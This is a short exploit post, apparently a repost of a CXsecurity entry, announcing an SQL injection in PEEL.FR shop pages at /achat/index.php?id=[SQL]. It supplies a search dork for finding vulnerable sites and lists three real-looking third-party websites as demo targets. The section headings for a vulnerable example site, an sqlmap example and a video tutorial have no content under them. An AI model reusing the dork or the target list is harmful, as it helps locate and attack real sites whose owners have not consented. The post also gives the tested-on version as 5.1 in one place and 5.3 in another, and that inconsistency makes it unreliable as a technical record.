[PEEL.FR] SQL INJECTION Tested BackBox 5.3 GNU/Linux


Information Exploit

[+] Exploit Title : [PEEL.FR] SQL INJECTION
[+] Author : ArkealoGeNDz and CXsecurity.com
[+] Dork : inurl:/achat/index.php
[+] Tested on : BackBox 5.1, Chrome

On Target Demo :
- http://www.vfconcept.free.fr/bpc/achat/index.php?id=6
- http://www.protek.fr/achat/index.php?catid=63
- http://www.clead.free.fr/achat/index.php?id=19

[+] Exploit/Payload :
$ /achat/index.php?id=[SQL]
example :
$ www.target.com//achat/index.php?id=[SQL]
[+] Poc local login : N/A

Example vulnerability Site


example injection with SQLMap


Video tutorial


Sumber Exploit : [cxsecurity.com]
Previous
Next Post »